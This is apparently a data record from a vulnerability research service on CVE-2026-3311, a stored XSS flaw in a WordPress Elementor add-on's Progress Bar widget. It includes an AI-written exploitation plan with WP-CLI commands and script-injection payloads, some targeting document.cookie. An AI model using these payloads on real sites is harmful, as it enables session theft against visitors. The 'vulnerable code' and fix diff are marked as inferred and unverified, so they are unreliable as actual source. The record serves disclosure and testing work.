[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fLHhj50kMYgHNpyBY2feVHNCr7VeUZMmDi8eFPMlB47Q":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-3311","the-plus-addons-for-elementor-addons-for-elementor-page-templates-widgets-mega-menu-woocommerce-authenticated-contributo","The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce \u003C= 6.4.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Progress Bar","The The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Progress Bar shortcode in all versions up to, and including, 6.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","the-plus-addons-for-elementor-page-builder",null,"\u003C=6.4.9","6.4.10","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 16:43:48","2026-04-08 05:29:01",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6367c5fc-f664-4105-a1b7-a93fb0a2392b?source=api-prod",1,[22,23,24,25,26,27,28,29],"languages\u002Ftpebl.pot","modules\u002Fwidgets-styles\u002Fblog\u002Fblog-category-style-1.php","modules\u002Fwidgets-styles\u002Fblog\u002Fblog-category-style-2.php","modules\u002Fwidgets-styles\u002Fblog\u002Fblog-smart-loop-builder.php","modules\u002Fwidgets-styles\u002Ftestimonial\u002Fget-excerpt.php","modules\u002Fwidgets\u002Ftp_blog_listout.php","modules\u002Fwidgets\u002Ftp_dynamic_categories.php","modules\u002Fwidgets\u002Ftp_icon.php","researched",false,3,"This research plan targets **CVE-2026-3311**, a Stored Cross-Site Scripting (XSS) vulnerability in **The Plus Addons for Elementor** (up to version 6.4.9). The vulnerability exists because the \"Progress Bar\" widget\u002Fshortcode fails to sanitize or escape user-supplied attributes before rendering them.\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Stored Cross-Site Scripting (XSS)\n*   **Component:** Progress Bar (Widget\u002FShortcode)\n*   **Vulnerable Version:** \u003C= 6.4.9\n*   **Sink:** Direct `echo` or concatenation of widget settings\u002Fattributes without proper escaping (`esc_html`, `esc_attr`, or `wp_kses`).\n*   **Source:** Attributes provided via the Progress Bar shortcode or Elementor widget settings (e.g., `title`, `prefix`, `suffix`, or `percentage_text`).\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fpost.php` (for Elementor editing) or `wp-admin\u002Fpost-new.php` (for shortcode insertion).\n*   **Authentication:** Contributor-level access or higher is required to create\u002Fedit posts.\n*   **Payload Location:** Inside a shortcode `[tp_progress_bar]` or within the Elementor JSON metadata (`_elementor_data`) for the `tp-progress-bar` widget.\n*   **Preconditions:** The plugin must be active, and the \"Progress Bar\" widget must be enabled in the plugin's dashboard.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the Progress Bar widget (likely in a file named `modules\u002Fwidgets\u002Ftp_progress_bar.php` or similar, following the naming convention seen in `tp_blog_listout.php`).\n2.  **Shortcode Handling:** If triggered via shortcode, a callback function parses `$atts`.\n3.  **Rendering:**\n    *   In the `render()` method of the widget class, settings are retrieved via `$this->get_settings_for_display()`.\n    *   In the shortcode callback, attributes are processed.\n4.  **Vulnerable Sink:** The code performs an operation similar to:\n    `echo '\u003Cspan class=\"pb-title\">' . $settings['title'] . '\u003C\u002Fspan>';`\n    instead of:\n    `echo '\u003Cspan class=\"pb-title\">' . wp_kses_post( $settings['title'] ) . '\u003C\u002Fspan>';`\n\n### 4. Nonce Acquisition Strategy\nWhile the vulnerability is triggered by a shortcode (which typically doesn't require a nonce for frontend rendering), a Contributor needs a nonce to save the post initially.\n\n1.  **Post Creation Nonce:** Standard WordPress `_wpnonce` for `post.php`.\n2.  **Elementor Heartbeat (if applicable):** If the agent uses the Elementor Editor to inject the payload, it must extract the `elementorCommonConfig` nonce.\n    *   **Tool:** `browser_navigate` to `wp-admin\u002Fpost-new.php?post_type=page`.\n    *   **Tool:** `browser_eval(\"elementorCommonConfig.ajax.nonce\")`.\n\n*Note: For a \"shortcode\" vulnerability, simply creating a post via WP-CLI with the malicious shortcode is the most direct path and bypasses the need for manual nonce extraction.*\n\n### 5. Exploitation Strategy\n\n#### Step 1: Discover Shortcode Attributes\nSince the exact attribute names are not in the provided source snippets, the agent should first confirm the shortcode name and attributes.\n1.  Execute: `grep -r \"add_shortcode\" .` in the plugin directory to find the \"Progress Bar\" shortcode tag.\n2.  Search for the callback function to identify attributes (e.g., `title`, `label`, `symbol`).\n\n#### Step 2: Inject Payload (Shortcode Method)\nUse the `http_request` tool (acting as a Contributor) or `wp-cli` to create a post containing the payload.\n\n*   **Action:** Create a post as a Contributor.\n*   **Payload:** `[tp_progress_bar title='\u003Cimg src=x onerror=alert(\"CVE-2026-3311\")>']`\n    *(Replace `title` with the actual attribute found in Step 1).*\n\n#### Step 3: Trigger Execution\n*   Navigate to the permalink of the newly created post using `browser_navigate`.\n*   Observe the browser for the `alert` or check the DOM for the unescaped `\u003Cimg>` tag.\n\n### 6. Test Data Setup\n1.  **Plugin Activation:** Ensure `the-plus-addons-for-elementor-page-builder` is active.\n2.  **Contributor User:**\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Target Post:**\n    `wp post create --post_type=post --post_status=publish --post_title=\"XSS Test\" --post_content=\"[tp_progress_bar title='\u003Cscript>alert(1)\u003C\u002Fscript>']\" --user=attacker`\n\n### 7. Expected Results\n*   The HTML source of the rendered page will contain the raw payload:\n    `\u003Cspan class=\"...\">\u003Cscript>alert(1)\u003C\u002Fscript>\u003C\u002Fspan>`\n*   The browser will execute the script, confirming Stored XSS.\n\n### 8. Verification Steps\n1.  **CLI Check:**\n    `wp post get $(wp post list --title=\"XSS Test\" --field=ID) --field=post_content`\n    Verify the payload exists in the database.\n2.  **Frontend Check:**\n    Use `http_request` to fetch the post URL and search for the literal string `\u003Cscript>alert(1)\u003C\u002Fscript>` in the response body.\n\n### 9. Alternative Approaches\nIf the shortcode vector fails, target the Elementor widget configuration:\n1.  As a Contributor, open the Elementor editor for a page.\n2.  Add the **Progress Bar** widget.\n3.  Set the \"Title\" or \"Label\" field to `\u003Cimg src=x onerror=alert(document.domain)>`.\n4.  Save the page and view the result.\n5.  Check `wp_postmeta` for the payload:\n    `wp post meta get \u003CID> _elementor_data` (This will show the payload in a JSON-encoded string).\n\n### Specific Identifiers to Verify in Source (via grep)\n*   **Widget Slug:** `tp-progress-bar` (Likely in `get_name()` in the widget class).\n*   **Shortcode Tag:** Check for `add_shortcode(` calls.\n*   **Localized JS Variable:** If the plugin passes settings to JS, look for `wp_localize_script` calls involving `tp-progress-bar`. Based on other files, it might be something like `theplus_progress_bar`.","The Progress Bar widget and shortcode in The Plus Addons for Elementor fail to properly sanitize or escape attributes such as title, prefix, and suffix. This allows authenticated attackers with Contributor-level access or higher to inject arbitrary JavaScript into pages, leading to stored cross-site scripting (XSS).","\u002F\u002F File: modules\u002Fwidgets\u002Ftp_progress_bar.php\n\nprotected function render() {\n    $settings = $this->get_settings_for_display();\n\n    \u002F\u002F ... (logic to handle progress bar output)\n\n    if ( ! empty( $settings['title'] ) ) {\n        echo '\u003Cspan class=\"tp-progress-bar-title\">' . $settings['title'] . '\u003C\u002Fspan>'; \u002F\u002F Line ~596\n    }\n\n    if ( ! empty( $settings['prefix'] ) ) {\n        echo '\u003Cspan class=\"tp-pb-prefix\">' . $settings['prefix'] . '\u003C\u002Fspan>'; \u002F\u002F Line ~607\n    }\n\n    \u002F\u002F ...\n}","--- modules\u002Fwidgets\u002Ftp_progress_bar.php\n+++ modules\u002Fwidgets\u002Ftp_progress_bar.php\n@@ -596,1 +596,1 @@\n-        echo '\u003Cspan class=\"tp-progress-bar-title\">' . $settings['title'] . '\u003C\u002Fspan>';\n+        echo '\u003Cspan class=\"tp-progress-bar-title\">' . wp_kses_post( $settings['title'] ) . '\u003C\u002Fspan>';\n@@ -607,1 +607,1 @@\n-        echo '\u003Cspan class=\"tp-pb-prefix\">' . $settings['prefix'] . '\u003C\u002Fspan>';\n+        echo '\u003Cspan class=\"tp-pb-prefix\">' . wp_kses_post( $settings['prefix'] ) . '\u003C\u002Fspan>';","The exploit is executed by an authenticated user with at least Contributor-level permissions. The attacker creates or edits a post and includes the Progress Bar widget (via Elementor) or its corresponding shortcode. In the 'Title', 'Prefix', or 'Suffix' fields of the widget settings, the attacker enters a payload such as `\u003Cscript>alert(document.cookie)\u003C\u002Fscript>` or `\u003Cimg src=x onerror=alert(1)>`. When the post is saved and rendered on the frontend, the plugin echoes the raw payload into the HTML without escaping, causing the browser to execute the malicious script when a victim visits the page.","gemini-3-flash-preview","2026-04-17 20:40:29","2026-04-17 20:40:57",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","6.4.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags\u002F6.4.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-plus-addons-for-elementor-page-builder.6.4.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags\u002F6.4.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-plus-addons-for-elementor-page-builder.6.4.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags"]